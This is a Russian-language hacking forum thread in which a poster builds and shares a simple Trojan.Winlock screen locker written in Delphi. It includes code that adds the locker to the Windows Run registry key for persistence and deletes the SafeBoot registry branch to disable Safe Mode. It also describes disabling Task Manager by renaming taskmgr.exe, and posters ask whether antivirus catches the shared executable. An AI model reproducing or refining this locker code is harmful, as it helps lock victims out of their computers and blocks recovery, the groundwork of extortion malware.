Простенький Trojan.Winlock на делфи

[X-Shar]

Сейчас доделываю, зделал возможность отключения F8, доделываю сам блокер, извините что так долго, но сделфи давно не общался, ждите !

 

[Антоха]

Мне что то тут не нравится обращение какое то, или ошибаюсь, Обращение к TForm1=class(TForm) и последнее значение var

Тут нормально всё.Этот всё автоматически появляется при создании Form.Это стандартное начало.

 

[BLONDY HACKER]

извините что так долго, но сделфи давно не общался, ждите !

ждемс

 

[X-Shar]

Блин простецкая прога, но провозился, у меня там ещё и сам делфи глючил, потом понял, что доктор вообще ничего не даёт сделать (На хрюши, тоже доктор стоял), за исходник взял уже написанный небольшой блокер и переделал его:

В общем смысл такой, при запуске программы, запускаются ещё три процедуры, для это в FormCreate, прописываем три процедуры:

Скопировать в буфер обмена

  StartUp;
  Taskmgr(False);
  SafeBoot(False);

StartUp - Это основная процедура, там мы запишем наш блокер в автозагрузку, ну и автор предыдущего блокера копировал файл в Windows и запускал от туда, но т.к. у меня что-то всё заглючело благодаря доктору, я переделал просто добавление в автозагрузку из папки, где находится программа, добавив такие строки:

Скопировать в буфер обмена

Reg:=TRegistry.Create;
  Reg.RootKey:=HKEY_CURRENT_USER;
  Reg.OpenKey('Software',True);
  Reg.OpenKey('Microsoft',True);
  Reg.OpenKey('Windows',True);
  Reg.OpenKey('CurrentVersion',True);
  Reg.OpenKey('Run',True);
  Reg.WriteString('MySoft','"'+Application.Exename+'"')

Где MySoft - это имя автозагрузки.

Taskmgr(False); - Это отключение диспетчера задач,путём переименования файла taskmgr.exe.

SafeBoot(False) - Это как раз функция отключения безопасного режима путём удаления веток в реестре, отключает F8 !

Остановлюсь о ней по подробней, в целом всё просто:

Скопировать в буфер обмена

procedure SafeBoot(SafeBoot: Boolean);
begin
  Reg := TRegistry.Create;
  Reg.RootKey := HKEY_LOCAL_MACHINE;
  if SafeBoot = False then
  begin
  Reg.lazywrite := false;
  Reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
  end
  else
  begin
	Reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\M',
	  'System\CurrentControlSet\Control\SafeBoot\minimal', true);
	Reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\N',
	  'System\CurrentControlSet\Control\SafeBoot\NetWork', true);
  end;
  Reg.CloseKey;
  Reg.Free;
end;

Если False, то удаляем ветку HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot, если труе, то восстанавливаем всё как было !

Функции получились булевые, т.к. в данном случае реализовано ещё и удаление блокера ! ;)

Ну и не забывайте про полноэкранный режим:

Скопировать в буфер обмена

form1.align:=alClient;
form1.borderstyle:=bsNone;

В общем пока всё, получилось немного коряво, зато вроде работает !

Пароль:111

 

[X-Shar]

Блин не тот файл залил, сейчас перезалью !

 

[X-Shar]

Перезалил !

 

[X-Shar]

И обратите внимание, обнаруживают-ли антивирусы вирус в project.exe ?

 

[X-Shar]

Очень даже тот,теперь и исходники можно увидеть:)Кстати твоя программка DeDe-шустрая зараза.Простенькие дельфийские экзешники вмиг расковыривает.

Я уже перезалил, Project1.exe нужно запускать ! ;)

 

[BLONDY HACKER]

И обратите внимание, обнаруживают-ли антивирусы вирус в project.exe ?

 

[Антоха]

Я уже перезалил, Project1.exe нужно запускать ! ;)

Да я понял))Безопасный режим на семёрке работает,даже если запускать из-под администратора.Локер можно свернуть комбинацией клавиш Win+D (затем просто закрыть и удалить).